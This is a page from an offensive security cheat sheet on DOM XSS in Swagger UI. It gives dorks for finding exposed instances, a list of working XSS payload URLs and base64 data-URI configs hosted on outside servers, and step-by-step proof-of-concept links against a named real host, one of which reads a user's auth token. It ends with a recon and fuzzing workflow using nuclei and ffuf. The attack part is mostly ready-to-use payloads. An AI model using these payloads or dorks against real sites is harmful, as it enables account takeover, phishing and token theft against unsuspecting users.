search

💊Swagger-UI

hashtag
Google Dork

site:broadcom.com intext:"Swagger UI" | intitle:"Swagger UI"
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?url= 
site:*.*.com intext:"swagger ui" intitle:"swagger ui" inurl:?configUrl=

hashtag
Shodan Dork:

http.title:"Swagger UI" hostname:"*.target.com"
?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
?configUrl=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

hashtag
What is Swagger Ui?

a really common library used to display API specifications in a nice-looking UI used by almost every company

allows users to provide a URL for an API specification, such as a YAML or JSON file.

hashtag
---------------------------------------------------------------

Swagger XSS Payloads
https://xss.smarpo.com/test.json
https://jumpy-floor.surge.sh/test.json
https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9
data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

hashtag
---------------------------------------------------------------

Steps to reproduce

hashtag
POC with simple alert box:

  1. Open https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

  2. You should see an alert box (Zrzut_ekranu_2022-01-9_o_22.08.24.png)

hashtag
POC rendering phishing page:

  1. Click the link: https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjogImh0dHBzOi8vdGVhcmZ1bC1lYXJ0aC5zdXJnZS5zaC90ZXN0LnlhbWwiLAp9

  2. You should see a phishing page rendered (Zrzut_ekranu_2022-01-9_o_22.08.49.png)

hashtag
POC of stealing auth token:

Jamf Pro stores authentication token in localstorage under authToken key when you authenticate using login and password, so my assumption is that it will do the same for Saml authentication. (you will have to test that) If it's true then taking over the user's account who clicked the link would be trivial. The POC below will print authToken from localstorage.

  1. Authenticate to jamfpro.shopifycloud.com and click the link: https://jamfpro.shopifycloud.com/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy1zYWx0LnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

  2. You should see an alert box with auth token.

hashtag
Impact

An attacker can execute arbitrary JS code in the context of https://jamfpro.shopifycloud.com/ - it means he can do whatever authenticated user at https://jamfpro.shopifycloud.com/ could do.

hashtag
Impact

An attacker can execute arbitrary JS code in the context of https://jamfpro.shopifycloud.com/ - it means he can do whatever authenticated user at https://jamfpro.shopifycloud.com/ could do.

hashtag
---------------------------------------------------------------

hashtag
How did I find DOM XSS ON Swagger-UI

hashtag
Are Vulnerable versions To DOM XSS 3.14.1 < 3.38.0

  1. Do a subdomain enum to find subs that use Swagger Ui

  2. Get the live subs

  3. So I ran nuclei on live subs with (-tags swagger) to get only those with Swagger API or Swagger UI.

  4. nuclei -l live-subs.txt -tags swagger

  5. The result was [swagger-api] [http] [info] h!!ps://something.example.com/swagger/ui/swagger-ui.js

  6. So I did some fuzzing: /swagger/ui/FUZZ

  7. You can run ffuf and use Large raft wordlist by Seclists:

  8. /swagger/index.html?configUrl=https://jumpy-floor.surge.sh/test.json

  9. /swagger-ui.html?url=https://jumpy-floor.surge.sh/test.yamlarrow-up-right

  10. /swagger-ui/index.html?url=https://jumpy-floor.surge.sh/test.yamlarrow-up-right

  11. And then finally, I got this https://something.example.com/swagger/ui/index.html?url=

  12. I tried this "h!!ps://jumpy-floor.surge.sh/test.yaml" as a payload and it worked

    example of the POC Link

  13. h!!ps://something.example.com/swagger/ui/index.html?url=https://jumpy-floor.surge.sh/test.yaml

hashtag
---------------------------------------------------------------

hashtag
Vuln web

PreviousPolyglot XSSNextSwagger-UI XSS Vulnerability Report Template

Last updated